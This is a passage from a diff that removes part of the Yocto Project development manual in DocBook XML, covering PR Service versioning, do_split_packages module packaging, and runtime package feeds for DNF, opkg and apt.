-                    for epoch, version, and revision, respectively).
-                    The values are highly dependent on the policies and
-                    procedures of a given distribution and package feed.
-                </para>
-
-                <para>
-                    Because the OpenEmbedded build system uses
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#overview-checksums'>signatures</ulink>",
-                    which are unique to a given build, the build system
-                    knows when to rebuild packages.
-                    All the inputs into a given task are represented by a
-                    signature, which can trigger a rebuild when different.
-                    Thus, the build system itself does not rely on the
-                    <filename>PR</filename>, <filename>PV</filename>, and
-                    <filename>PE</filename> numbers to trigger a rebuild.
-                    The signatures, however, can be used to generate
-                    these values.
-                </para>
-
-                <para>
-                    The PR Service works with both
-                    <filename>OEBasic</filename> and
-                    <filename>OEBasicHash</filename> generators.
-                    The value of <filename>PR</filename> bumps when the
-                    checksum changes and the different generator mechanisms
-                    change signatures under different circumstances.
-                </para>
-
-                <para>
-                    As implemented, the build system includes values from
-                    the PR Service into the <filename>PR</filename> field as
-                    an addition using the form "<filename>.x</filename>" so
-                    <filename>r0</filename> becomes <filename>r0.1</filename>,
-                    <filename>r0.2</filename> and so forth.
-                    This scheme allows existing <filename>PR</filename> values
-                    to be used for whatever reasons, which include manual
-                    <filename>PR</filename> bumps, should it be necessary.
-                </para>
-
-                <para>
-                    By default, the PR Service is not enabled or running.
-                    Thus, the packages generated are just "self consistent".
-                    The build system adds and removes packages and
-                    there are no guarantees about upgrade paths but images
-                    will be consistent and correct with the latest changes.
-                </para>
-
-                <para>
-                    The simplest form for a PR Service is for it to exist
-                    for a single host development system that builds the
-                    package feed (building system).
-                    For this scenario, you can enable a local PR Service by
-                    setting
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PRSERV_HOST'><filename>PRSERV_HOST</filename></ulink>
-                    in your <filename>local.conf</filename> file in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
-                    <literallayout class='monospaced'>
-     PRSERV_HOST = "localhost:0"
-                    </literallayout>
-                    Once the service is started, packages will automatically
-                    get increasing <filename>PR</filename> values and
-                    BitBake takes care of starting and stopping the server.
-                </para>
-
-                <para>
-                    If you have a more complex setup where multiple host
-                    development systems work against a common, shared package
-                    feed, you have a single PR Service running and it is
-                    connected to each building system.
-                    For this scenario, you need to start the PR Service using
-                    the <filename>bitbake-prserv</filename> command:
-                    <literallayout class='monospaced'>
-     bitbake-prserv --host <replaceable>ip</replaceable> --port <replaceable>port</replaceable> --start
-                    </literallayout>
-                    In addition to hand-starting the service, you need to
-                    update the <filename>local.conf</filename> file of each
-                    building system as described earlier so each system
-                    points to the server and port.
-                </para>
-
-                <para>
-                    It is also recommended you use build history, which adds
-                    some sanity checks to binary package versions, in
-                    conjunction with the server that is running the PR Service.
-                    To enable build history, add the following to each building
-                    system's <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     # It is recommended to activate "buildhistory" for testing the PR service
-     INHERIT += "buildhistory"
-     BUILDHISTORY_COMMIT = "1"
-                    </literallayout>
-                    For information on build history, see the
-                    "<link linkend='maintaining-build-output-quality'>Maintaining Build Output Quality</link>"
-                    section.
-                </para>
-
-                <note>
-                    <para>
-                        The OpenEmbedded build system does not maintain
-                        <filename>PR</filename> information as part of the
-                        shared state (sstate) packages.
-                        If you maintain an sstate feed, its expected that either
-                        all your building systems that contribute to the sstate
-                         feed use a shared PR Service, or you do not run a PR
-                        Service on any of your building systems.
-                        Having some systems use a PR Service while others do
-                        not leads to obvious problems.
-                    </para>
-
-                    <para>
-                        For more information on shared state, see the
-                        "<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>Shared State Cache</ulink>"
-                        section in the Yocto Project Overview and Concepts
-                        Manual.
-                    </para>
-                </note>
-            </section>
-
-            <section id='manually-bumping-pr'>
-                <title>Manually Bumping PR</title>
-
-                <para>
-                    The alternative to setting up a PR Service is to manually
-                    "bump" the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
-                    variable.
-                </para>
-
-                <para>
-                    If a committed change results in changing the package
-                    output, then the value of the PR variable needs to be
-                    increased (or "bumped") as part of that commit.
-                    For new recipes you should add the <filename>PR</filename>
-                    variable and set its initial value equal to "r0", which is
-                    the default.
-                    Even though the default value is "r0", the practice of
-                    adding it to a new recipe makes it harder to forget to bump
-                    the variable when you make changes to the recipe in future.
-                </para>
-
-                <para>
-                    If you are sharing a common <filename>.inc</filename> file
-                    with multiple recipes, you can also use the
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-INC_PR'>INC_PR</ulink></filename>
-                    variable to ensure that the recipes sharing the
-                    <filename>.inc</filename> file are rebuilt when the
-                    <filename>.inc</filename> file itself is changed.
-                    The <filename>.inc</filename> file must set
-                    <filename>INC_PR</filename> (initially to "r0"), and all
-                    recipes referring to it should set <filename>PR</filename>
-                    to "${INC_PR}.0" initially, incrementing the last number
-                    when the recipe is changed.
-                    If the <filename>.inc</filename> file is changed then its
-                    <filename>INC_PR</filename> should be incremented.
-                </para>
-
-                <para>
-                    When upgrading the version of a binary package, assuming the
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'>PV</ulink></filename>
-                    changes, the <filename>PR</filename> variable should be
-                    reset to "r0" (or "${INC_PR}.0" if you are using
-                    <filename>INC_PR</filename>).
-                </para>
-
-                <para>
-                    Usually, version increases occur only to binary packages.
-                    However, if for some reason <filename>PV</filename> changes
-                    but does not increase, you can increase the
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PE'>PE</ulink></filename>
-                    variable (Package Epoch).
-                    The <filename>PE</filename> variable defaults to "0".
-                </para>
-
-                <para>
-                    Binary package version numbering strives to follow the
-                    <ulink url='http://www.debian.org/doc/debian-policy/ch-controlfields.html'>
-                    Debian Version Field Policy Guidelines</ulink>.
-                    These guidelines define how versions are compared and what
-                    "increasing" a version means.
-                </para>
-            </section>
-
-            <section id='automatically-incrementing-a-binary-package-revision-number'>
-                <title>Automatically Incrementing a Package Version Number</title>
-
-                <para>
-                    When fetching a repository, BitBake uses the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
-                    variable to determine the specific source code revision
-                    from which to build.
-                    You set the <filename>SRCREV</filename> variable to
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-AUTOREV'><filename>AUTOREV</filename></ulink>
-                    to cause the OpenEmbedded build system to automatically use the
-                    latest revision of the software:
-                    <literallayout class='monospaced'>
-     SRCREV = "${AUTOREV}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Furthermore, you need to reference <filename>SRCPV</filename>
-                    in <filename>PV</filename> in order to automatically update
-                    the version whenever the revision of the source code
-                    changes.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     PV = "1.0+git${SRCPV}"
-                    </literallayout>
-                    The OpenEmbedded build system substitutes
-                    <filename>SRCPV</filename> with the following:
-                    <literallayout class='monospaced'>
-     AUTOINC+<replaceable>source_code_revision</replaceable>
-                    </literallayout>
-                    The build system replaces the <filename>AUTOINC</filename> with
-                    a number.
-                    The number used depends on the state of the PR Service:
-                    <itemizedlist>
-                        <listitem><para>
-                            If PR Service is enabled, the build system increments
-                            the number, which is similar to the behavior of
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>.
-                            This behavior results in linearly increasing package
-                            versions, which is desirable.
-                            Here is an example:
-                            <literallayout class='monospaced'>
-     hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
-     hello-world-git_0.0+git1+dd2f5c3565-r0.0_armv7a-neon.ipk
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            If PR Service is not enabled, the build system
-                            replaces the <filename>AUTOINC</filename>
-                            placeholder with zero (i.e. "0").
-                            This results in changing the package version since
-                            the source revision is included.
-                            However, package versions are not increased linearly.
-                            Here is an example:
-                            <literallayout class='monospaced'>
-     hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
-     hello-world-git_0.0+git0+dd2f5c3565-r0.0_armv7a-neon.ipk
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    In summary, the OpenEmbedded build system does not track the
-                    history of binary package versions for this purpose.
-                    <filename>AUTOINC</filename>, in this case, is comparable to
-                    <filename>PR</filename>.
-                    If PR server is not enabled, <filename>AUTOINC</filename>
-                    in the package version is simply replaced by "0".
-                    If PR server is enabled, the build system keeps track of the
-                    package versions and bumps the number when the package
-                    revision changes.
-                </para>
-            </section>
-        </section>
-
-        <section id='handling-optional-module-packaging'>
-            <title>Handling Optional Module Packaging</title>
-
-            <para>
-                Many pieces of software split functionality into optional
-                modules (or plugins) and the plugins that are built
-                might depend on configuration options.
-                To avoid having to duplicate the logic that determines what
-                modules are available in your recipe or to avoid having
-                to package each module by hand, the OpenEmbedded build system
-                provides functionality to handle module packaging dynamically.
-            </para>
-
-            <para>
-                To handle optional module packaging, you need to do two things:
-                <itemizedlist>
-                    <listitem><para>Ensure the module packaging is actually
-                        done.</para></listitem>
-                    <listitem><para>Ensure that any dependencies on optional
-                        modules from other recipes are satisfied by your recipe.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <section id='making-sure-the-packaging-is-done'>
-                <title>Making Sure the Packaging is Done</title>
-
-                <para>
-                    To ensure the module packaging actually gets done, you use
-                    the <filename>do_split_packages</filename> function within
-                    the <filename>populate_packages</filename> Python function
-                    in your recipe.
-                    The <filename>do_split_packages</filename> function
-                    searches for a pattern of files or directories under a
-                    specified path and creates a package for each one it finds
-                    by appending to the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
-                    variable and setting the appropriate values for
-                    <filename>FILES_packagename</filename>,
-                    <filename>RDEPENDS_packagename</filename>,
-                    <filename>DESCRIPTION_packagename</filename>, and so forth.
-                    Here is an example from the <filename>lighttpd</filename>
-                    recipe:
-                    <literallayout class='monospaced'>
-     python populate_packages_prepend () {
-         lighttpd_libdir = d.expand('${libdir}')
-         do_split_packages(d, lighttpd_libdir, '^mod_(.*)\.so$',
-                          'lighttpd-module-%s', 'Lighttpd module for %s',
-                           extra_depends='')
-     }
-                    </literallayout>
-                    The previous example specifies a number of things in the
-                    call to <filename>do_split_packages</filename>.
-                    <itemizedlist>
-                        <listitem><para>A directory within the files installed
-                            by your recipe through <filename>do_install</filename>
-                            in which to search.</para></listitem>
-                        <listitem><para>A regular expression used to match module
-                            files in that directory.
-                            In the example, note the parentheses () that mark
-                            the part of the expression from which the module
-                            name should be derived.</para></listitem>
-                        <listitem><para>A pattern to use for the package names.
-                            </para></listitem>
-                        <listitem><para>A description for each package.
-                            </para></listitem>
-                        <listitem><para>An empty string for
-                            <filename>extra_depends</filename>, which disables
-                            the default dependency on the main
-                            <filename>lighttpd</filename> package.
-                            Thus, if a file in <filename>${libdir}</filename>
-                            called <filename>mod_alias.so</filename> is found,
-                            a package called <filename>lighttpd-module-alias</filename>
-                            is created for it and the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-DESCRIPTION'><filename>DESCRIPTION</filename></ulink>
-                            is set to "Lighttpd module for alias".</para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    Often, packaging modules is as simple as the previous
-                    example.
-                    However, more advanced options exist that you can use
-                    within <filename>do_split_packages</filename> to modify its
-                    behavior.
-                    And, if you need to, you can add more logic by specifying
-                    a hook function that is called for each package.
-                    It is also perfectly acceptable to call
-                    <filename>do_split_packages</filename> multiple times if
-                    you have more than one set of modules to package.
-                </para>
-
-                <para>
-                    For more examples that show how to use
-                    <filename>do_split_packages</filename>, see the
-                    <filename>connman.inc</filename> file in the
-                    <filename>meta/recipes-connectivity/connman/</filename>
-                    directory of the <filename>poky</filename>
-                    <ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>source repository</ulink>.
-                    You can also find examples in
-                    <filename>meta/classes/kernel.bbclass</filename>.
-                 </para>
-
-                 <para>
-                     Following is a reference that shows
-                     <filename>do_split_packages</filename> mandatory and
-                     optional arguments:
-                     <literallayout class='monospaced'>
-     Mandatory arguments
-
-     root
-        The path in which to search
-     file_regex
-        Regular expression to match searched files.
-        Use parentheses () to mark the part of this
-        expression that should be used to derive the
-        module name (to be substituted where %s is
-        used in other function arguments as noted below)
-     output_pattern
-        Pattern to use for the package names. Must
-        include %s.
-     description
-        Description to set for each package. Must
-        include %s.
-
-     Optional arguments
-
-     postinst
-        Postinstall script to use for all packages
-        (as a string)
-     recursive
-        True to perform a recursive search - default
-        False
-     hook
-        A hook function to be called for every match.
-        The function will be called with the following
-        arguments (in the order listed):
-
-        f
-           Full path to the file/directory match
-        pkg
-           The package name
-        file_regex
-           As above
-        output_pattern
-           As above
-        modulename
-           The module name derived using file_regex
-
-     extra_depends
-        Extra runtime dependencies (RDEPENDS) to be
-        set for all packages. The default value of None
-        causes a dependency on the main package
-        (${PN}) - if you do not want this, pass empty
-        string '' for this parameter.
-     aux_files_pattern
-        Extra item(s) to be added to FILES for each
-        package. Can be a single string item or a list
-        of strings for multiple items. Must include %s.
-     postrm
-        postrm script to use for all packages (as a
-        string)
-     allow_dirs
-        True to allow directories to be matched -
-        default False
-     prepend
-        If True, prepend created packages to PACKAGES
-        instead of the default False which appends them
-     match_path
-        match file_regex on the whole relative path to
-        the root rather than just the file name
-     aux_files_pattern_verbatim
-        Extra item(s) to be added to FILES for each
-        package, using the actual derived module name
-        rather than converting it to something legal
-        for a package name. Can be a single string item
-        or a list of strings for multiple items. Must
-        include %s.
-     allow_links
-        True to allow symlinks to be matched - default
-        False
-     summary
-        Summary to set for each package. Must include %s;
-        defaults to description if not set.
-                     </literallayout>
-                 </para>
-            </section>
-
-            <section id='satisfying-dependencies'>
-                <title>Satisfying Dependencies</title>
-
-                <para>
-                    The second part for handling optional module packaging
-                    is to ensure that any dependencies on optional modules
-                    from other recipes are satisfied by your recipe.
-                    You can be sure these dependencies are satisfied by
-                    using the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></ulink> variable.
-                    Here is an example that continues with the
-                    <filename>lighttpd</filename> recipe shown earlier:
-                    <literallayout class='monospaced'>
-     PACKAGES_DYNAMIC = "lighttpd-module-.*"
-                    </literallayout>
-                    The name specified in the regular expression can of
-                    course be anything.
-                    In this example, it is <filename>lighttpd-module-</filename>
-                    and is specified as the prefix to ensure that any
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
-                    and <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>
-                    on a package name starting with the prefix are satisfied
-                    during build time.
-                    If you are using <filename>do_split_packages</filename>
-                    as described in the previous section, the value you put in
-                    <filename>PACKAGES_DYNAMIC</filename> should correspond to
-                    the name pattern specified in the call to
-                    <filename>do_split_packages</filename>.
-                </para>
-            </section>
-        </section>
-
-        <section id='using-runtime-package-management'>
-            <title>Using Runtime Package Management</title>
-
-            <para>
-                During a build, BitBake always transforms a recipe into one or
-                more packages.
-                For example, BitBake takes the <filename>bash</filename> recipe
-                and produces a number of packages (e.g.
-                <filename>bash</filename>, <filename>bash-bashbug</filename>,
-                <filename>bash-completion</filename>,
-                <filename>bash-completion-dbg</filename>,
-                <filename>bash-completion-dev</filename>,
-                <filename>bash-completion-extra</filename>,
-                <filename>bash-dbg</filename>, and so forth).
-                Not all generated packages are included in an image.
-            </para>
-
-            <para>
-                In several situations, you might need to update, add, remove,
-                or query the packages on a target device at runtime
-                (i.e. without having to generate a new image).
-                Examples of such situations include:
-                <itemizedlist>
-                    <listitem><para>
-                        You want to provide in-the-field updates to deployed
-                        devices (e.g. security updates).
-                        </para></listitem>
-                    <listitem><para>
-                        You want to have a fast turn-around development cycle
-                        for one or more applications that run on your device.
-                        </para></listitem>
-                    <listitem><para>
-                        You want to temporarily install the "debug" packages
-                        of various applications on your device so that
-                        debugging can be greatly improved by allowing
-                        access to symbols and source debugging.
-                        </para></listitem>
-                    <listitem><para>
-                        You want to deploy a more minimal package selection of
-                        your device but allow in-the-field updates to add a
-                        larger selection for customization.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                In all these situations, you have something similar to a more
-                traditional Linux distribution in that in-field devices
-                are able to receive pre-compiled packages from a server for
-                installation or update.
-                Being able to install these packages on a running,
-                in-field device is what is termed "runtime package
-                management".
-            </para>
-
-            <para>
-                In order to use runtime package management, you
-                need a host or server machine that serves up the pre-compiled
-                packages plus the required metadata.
-                You also need package manipulation tools on the target.
-                The build machine is a likely candidate to act as the server.
-                However, that machine does not necessarily have to be the
-                package server.
-                The build machine could push its artifacts to another machine
-                that acts as the server (e.g. Internet-facing).
-                In fact, doing so is advantageous for a production
-                environment as getting the packages away from the
-                development system's build directory prevents accidental
-                overwrites.
-            </para>
-
-            <para>
-                A simple build that targets just one device produces
-                more than one package database.
-                In other words, the packages produced by a build are separated
-                out into a couple of different package groupings based on
-                criteria such as the target's CPU architecture, the target
-                board, or the C library used on the target.
-                For example, a build targeting the <filename>qemux86</filename>
-                device produces the following three package databases:
-                <filename>noarch</filename>, <filename>i586</filename>, and
-                <filename>qemux86</filename>.
-                If you wanted your <filename>qemux86</filename> device to be
-                aware of all the packages that were available to it,
-                you would need to point it to each of these databases
-                individually.
-                In a similar way, a traditional Linux distribution usually is
-                configured to be aware of a number of software repositories
-                from which it retrieves packages.
-            </para>
-
-            <para>
-                Using runtime package management is completely optional and
-                not required for a successful build or deployment in any
-                way.
-                But if you want to make use of runtime package management,
-                you need to do a couple things above and beyond the basics.
-                The remainder of this section describes what you need to do.
-            </para>
-
-            <section id='runtime-package-management-build'>
-                <title>Build Considerations</title>
-
-                <para>
-                    This section describes build considerations of which you
-                    need to be aware in order to provide support for runtime
-                    package management.
-                </para>
-
-                <para>
-                    When BitBake generates packages, it needs to know
-                    what format or formats to use.
-                    In your configuration, you use the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
-                    variable to specify the format:
-                    <orderedlist>
-                        <listitem><para>
-                            Open the <filename>local.conf</filename> file
-                            inside your
-                            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                            (e.g. <filename>~/poky/build/conf/local.conf</filename>).
-                            </para></listitem>
-                        <listitem><para>
-                            Select the desired package format as follows:
-                            <literallayout class='monospaced'>
-     PACKAGE_CLASSES ?= “package_<replaceable>packageformat</replaceable>�
-                            </literallayout>
-                            where <replaceable>packageformat</replaceable>
-                            can be "ipk", "rpm", "deb", or "tar" which are the
-                            supported package formats.
-                            <note>
-                                Because the Yocto Project supports four
-                                different package formats, you can set the
-                                variable with more than one argument.
-                                However, the OpenEmbedded build system only
-                                uses the first argument when creating an image
-                                or Software Development Kit (SDK).
-                            </note>
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-
-                <para>
-                    If you would like your image to start off with a basic
-                    package database containing the packages in your current
-                    build as well as to have the relevant tools available on the
-                    target for runtime package management, you can include
-                    "package-management" in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
-                    variable.
-                    Including "package-management" in this configuration
-                    variable ensures that when the image is assembled for your
-                    target, the image includes the currently-known package
-                    databases as well as the target-specific tools required
-                    for runtime package management to be performed on the
-                    target.
-                    However, this is not strictly necessary.
-                    You could start your image off without any databases
-                    but only include the required on-target package
-                    tool(s).
-                    As an example, you could include "opkg" in your
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>
-                    variable if you are using the IPK package format.
-                    You can then initialize your target's package database(s)
-                    later once your image is up and running.
-                </para>
-
-                <para>
-                    Whenever you perform any sort of build step that can
-                    potentially generate a package or modify   existing
-                    package, it is always a good idea to re-generate the
-                    package index after the build by using the following
-                    command:
-                    <literallayout class='monospaced'>
-    $ bitbake package-index
-                    </literallayout>
-                    It might be tempting to build the package and the
-                    package index at the same time with a command such as
-                    the following:
-                    <literallayout class='monospaced'>
-    $ bitbake <replaceable>some-package</replaceable> package-index
-                    </literallayout>
-                    Do not do this as BitBake does not schedule the package
-                    index for after the completion of the package you are
-                    building.
-                    Consequently, you cannot be sure of the package index
-                    including information for the package you just built.
-                    Thus, be sure to run the package update step separately
-                    after building any packages.
-                </para>
-
-                <para>
-                    You can use the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>,
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
-                    variables to pre-configure target images to use a package
-                    feed.
-                    If you do not define these variables, then manual steps
-                    as described in the subsequent sections are necessary to
-                    configure the target.
-                    You should set these variables before building the image
-                    in order to produce a correctly configured image.
-                </para>
-
-                <para>
-                    When your build is complete, your packages reside in the
-                    <filename>${TMPDIR}/deploy/<replaceable>packageformat</replaceable></filename>
-                    directory.
-                    For example, if
-                    <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink><filename>}</filename>
-                    is <filename>tmp</filename> and your selected package type
-                    is RPM, then your RPM packages are available in
-                    <filename>tmp/deploy/rpm</filename>.
-                </para>
-            </section>
-
-            <section id='runtime-package-management-server'>
-                <title>Host or Server Machine Setup</title>
-
-                <para>
-                    Although other protocols are possible, a server using HTTP
-                    typically serves packages.
-                    If you want to use HTTP, then set up and configure a
-                    web server such as Apache 2, lighttpd, or
-                    SimpleHTTPServer on the machine serving the packages.
-                </para>
-
-                <para>
-                    To keep things simple, this section describes how to set
-                    up a SimpleHTTPServer web server to share package feeds
-                    from the developer's machine.
-                    Although this server might not be the best for a production
-                    environment, the setup is simple and straight forward.
-                    Should you want to use a different server more suited for
-                    production (e.g. Apache 2, Lighttpd, or Nginx), take the
-                    appropriate steps to do so.
-                </para>
-
-                <para>
-                    From within the build directory where you have built an
-                    image based on your packaging choice (i.e. the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
-                    setting), simply start the server.
-                    The following example assumes a build directory of
-                    <filename>~/poky/build/tmp/deploy/rpm</filename> and a
-                    <filename>PACKAGE_CLASSES</filename> setting of
-                    "package_rpm":
-                    <literallayout class='monospaced'>
-     $ cd ~/poky/build/tmp/deploy/rpm
-     $ python -m SimpleHTTPServer
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='runtime-package-management-target'>
-                <title>Target Setup</title>
-
-                <para>
-                    Setting up the target differs depending on the
-                    package management system.
-                    This section provides information for RPM, IPK, and DEB.
-                </para>
-
-                <section id='runtime-package-management-target-rpm'>
-                    <title>Using RPM</title>
-
-                    <para>
-                        The
-                        <ulink url='https://en.wikipedia.org/wiki/DNF_(software)'>Dandified Packaging Tool</ulink>
-                        (DNF) performs runtime package management of RPM
-                        packages.
-                        In order to use DNF for runtime package management,
-                        you must perform an initial setup on the target
-                        machine for cases where the
-                        <filename>PACKAGE_FEED_*</filename> variables were not
-                        set as part of the image that is running on the
-                        target.
-                        This means if you built your image and did not not use
-                        these variables as part of the build and your image is
-                        now running on the target, you need to perform the
-                        steps in this section if you want to use runtime
-                        package management.
-                        <note>
-                            For information on the
-                            <filename>PACKAGE_FEED_*</filename> variables, see
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>,
-                            and
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
-                            in the Yocto Project Reference Manual variables
-                            glossary.
-                        </note>
-                    </para>
-
-                    <para>
-                        On the target, you must inform DNF that package
-                        databases are available.
-                        You do this by creating a file named
-                        <filename>/etc/yum.repos.d/oe-packages.repo</filename>
-                        and defining the <filename>oe-packages</filename>.
-                    </para>
-
-                    <para>
-                        As an example, assume the target is able to use the
-                        following package databases:
-                        <filename>all</filename>, <filename>i586</filename>,
-                        and <filename>qemux86</filename> from a server named
-                        <filename>my.server</filename>.
-                        The specifics for setting up the web server are up to
-                        you.
-                        The critical requirement is that the URIs in the
-                        target repository configuration point to the
-                        correct remote location for the feeds.
-                        <note><title>Tip</title>
-                            For development purposes, you can point the web
-                            server to the build system's
-                            <filename>deploy</filename> directory.
-                            However, for production use, it is better to copy
-                            the package directories to a location outside of
-                            the build area and use that location.
-                            Doing so avoids situations where the build system
-                            overwrites or changes the
-                            <filename>deploy</filename> directory.
-                        </note>
-                    </para>
-
-                    <para>
-                        When telling DNF where to look for the package
-                        databases, you must declare individual locations
-                        per architecture or a single location used for all
-                        architectures.
-                        You cannot do both:
-                        <itemizedlist>
-                            <listitem><para>
-                                <emphasis>Create an Explicit List of Architectures:</emphasis>
-                                Define individual base URLs to identify where
-                                each package database is located:
-                                <literallayout class='monospaced'>
-     [oe-packages]
-     baseurl=http://my.server/rpm/i586 http://my.server/rpm/qemux86 http://my.server/rpm/all
-                                </literallayout>
-                                This example informs DNF about individual
-                                package databases for all three architectures.
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis>Create a Single (Full) Package Index:</emphasis>
-                                Define a single base URL that identifies where
-                                a full package database is located:
-                                <literallayout class='monospaced'>
-     [oe-packages]
-     baseurl=http://my.server/rpm
-                                </literallayout>
-                                This example informs DNF about a single package
-                                database that contains all the package index
-                                information for all supported architectures.
-                                </para></listitem>
-                        </itemizedlist>
-                    </para>
-
-                    <para>
-                        Once you have informed DNF where to find the package
-                        databases, you need to fetch them:
-                        <literallayout class='monospaced'>
-     # dnf makecache
-                        </literallayout>
-                        DNF is now able to find, install, and upgrade packages
-                        from the specified repository or repositories.
-                        <note>
-                            See the
-                            <ulink url='http://dnf.readthedocs.io/en/latest/'>DNF documentation</ulink>
-                            for additional information.
-                        </note>
-                    </para>
-                </section>
-
-                <section id='runtime-package-management-target-ipk'>
-                    <title>Using IPK</title>
-
-                    <para>
-                        The <filename>opkg</filename> application performs
-                        runtime package management of IPK packages.
-                        You must perform an initial setup for
-                        <filename>opkg</filename> on the target machine
-                        if the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>, and
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
-                        variables have not been set or the target image was
-                        built before the variables were set.
-                    </para>
-
-                    <para>
-                        The <filename>opkg</filename> application uses
-                        configuration files to find available package
-                        databases.
-                        Thus, you need to create a configuration file inside
-                        the <filename>/etc/opkg/</filename> direction, which
-                        informs <filename>opkg</filename> of any repository
-                        you want to use.
-                    </para>
-
-                    <para>
-                        As an example, suppose you are serving packages from a
-                        <filename>ipk/</filename> directory containing the
-                        <filename>i586</filename>,
-                        <filename>all</filename>, and
-                        <filename>qemux86</filename> databases through an
-                        HTTP server named <filename>my.server</filename>.
-                        On the target, create a configuration file
-                        (e.g. <filename>my_repo.conf</filename>) inside the
-                        <filename>/etc/opkg/</filename> directory containing
-                        the following:
-                        <literallayout class='monospaced'>
-     src/gz all http://my.server/ipk/all
-     src/gz i586 http://my.server/ipk/i586
-     src/gz qemux86 http://my.server/ipk/qemux86
-                        </literallayout>
-                        Next, instruct <filename>opkg</filename> to fetch
-                        the repository information:
-                        <literallayout class='monospaced'>
-     # opkg update
-                        </literallayout>
-                        The <filename>opkg</filename> application is now able
-                        to find, install, and upgrade packages from the
-                        specified repository.
-                    </para>
-                </section>
-
-                <section id='runtime-package-management-target-deb'>
-                    <title>Using DEB</title>
-
-                    <para>
-                        The <filename>apt</filename> application performs
-                        runtime package management of DEB packages.
-                        This application uses a source list file to find
-                        available package databases.
-                        You must perform an initial setup for
-                        <filename>apt</filename> on the target machine
-                        if the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>, and
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
-                        variables have not been set or the target image was
-                        built before the variables were set.
-                    </para>
-
-                    <para>
-                        To inform <filename>apt</filename> of the repository
-                        you want to use, you might create a list file (e.g.
-                        <filename>my_repo.list</filename>) inside the
-                        <filename>/etc/apt/sources.list.d/</filename>
-                        directory.
-                        As an example, suppose you are serving packages from a
-                        <filename>deb/</filename> directory containing the
-                        <filename>i586</filename>,
-                        <filename>all</filename>, and
-                        <filename>qemux86</filename> databases through an
-                        HTTP server named <filename>my.server</filename>.
-                        The list file should contain:
-                        <literallayout class='monospaced'>
-     deb http://my.server/deb/all ./
-     deb http://my.server/deb/i586 ./
